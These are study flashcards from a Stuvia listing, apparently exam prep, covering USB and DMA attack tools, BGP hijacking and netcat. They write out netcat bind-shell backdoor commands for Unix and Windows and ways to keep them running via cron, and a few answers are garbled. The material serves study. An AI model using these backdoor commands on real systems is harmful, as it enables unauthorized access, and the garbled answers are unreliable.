Kon-Boot - Answer USB boot attack that accepts any password as a correct password.
Works on Mac and Windows
Inception - Answer Unlocking a powered-on and locked computer via DMA
firewire/Thunderbolt connections. It is great to get access to systems with hard drive
encryption
Lanturtle+Responder - Answer USB attack: a malicious USB Ethernet adapter makes a
system generate DNS requests, and Responder can capture hashes
Rubber Duckies - Answer Appears as a USB thumb drive but in reality is an automated
keyboard and one that types very rapidly. Can permit an attacker to download malware,
steal files and brute force pins on some phones
Border Gateway Protocol (BGP) - Answer Permits routers on the Internet to know where
to route traffic
Autonomous System Numbers (ASN) - Answer Define which IP addresses a router is
responsible for
BGP Hijacking - Answer: This attack depends upon an attacker broadcasting an ASN,
which contains a more specific route to an IP address. To accomplish this, an attacker
would have to have access to an edge router where they can change broadcast BGP
and ASN information.
Netcat - Focus is moving raw data between ports on systems. Uses: Data transfer, port
and vulnerability scanning, Making connections to open ports, backdoor, relays
, Netcat has two modes:-Answer Client mode (Default)
Listen mode
Netcat client mode initiates a connection to a specific port-Answer True
Netcat Listen Mode - Answer Waits for a connection on a specific port. Here a client
initiates the connection
- Answer dump output to a file
< - Answer dump input from a file
-L - Answer Listen Harder. Only supported on Windows
(Netcat) -Z - Answer Zero I/O mode (useful for scanning)
(Netcat) -wN - Answer timeout for connects, waits N seconds
listener: nc -l - p [port] < filename
client: nc [listenerIP] [port] > filename - Answer move a file from a listener back to a
client
listener: nc -l - p [port] > filename
client: nc [listenerIP] [port] < filename - Equal Sign "=" in sending the file from client to
listener
Unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe - Shell backdoor at any port, TCP or UDP
On Linux/Unix netcat can be made persistent via. - Answer - scheduling a cron job to
start netcat regularly
-use a version of netcat that supports -L/
- use a while loop
The benefits of buying summaries with Stuvia:
Guaranteed quality through customer reviews
Stuvia customers have reviewed more than 700,000 summaries. This how you know that you are buying the best documents.
Quick and easy check-out
You can quickly pay through credit card or Stuvia-credit for the summaries. There is no membership needed.
Focus on what matters
Your fellow students write the study notes themselves, which is why the documents are always reliable and up-to-date. This ensures you quickly get to the core!
Frequently asked questions
What do I get when I buy this document?
You get a PDF, available immediately after your purchase. The purchased document is accessible anytime, anywhere and indefinitely through your profile.
Satisfaction guarantee: how does it work?
Our satisfaction guarantee ensures that you always find a study document that suits you well. You fill out a form, and our customer service team takes care of the rest.
Who am I buying these notes from?
Stuvia is a marketplace, so you are not buying this document from us, but from seller Stetson. Stuvia facilitates payment to the seller.
Will I be stuck with a subscription?
No, you only buy these notes for $10.99. You're not tied to anything after your purchase.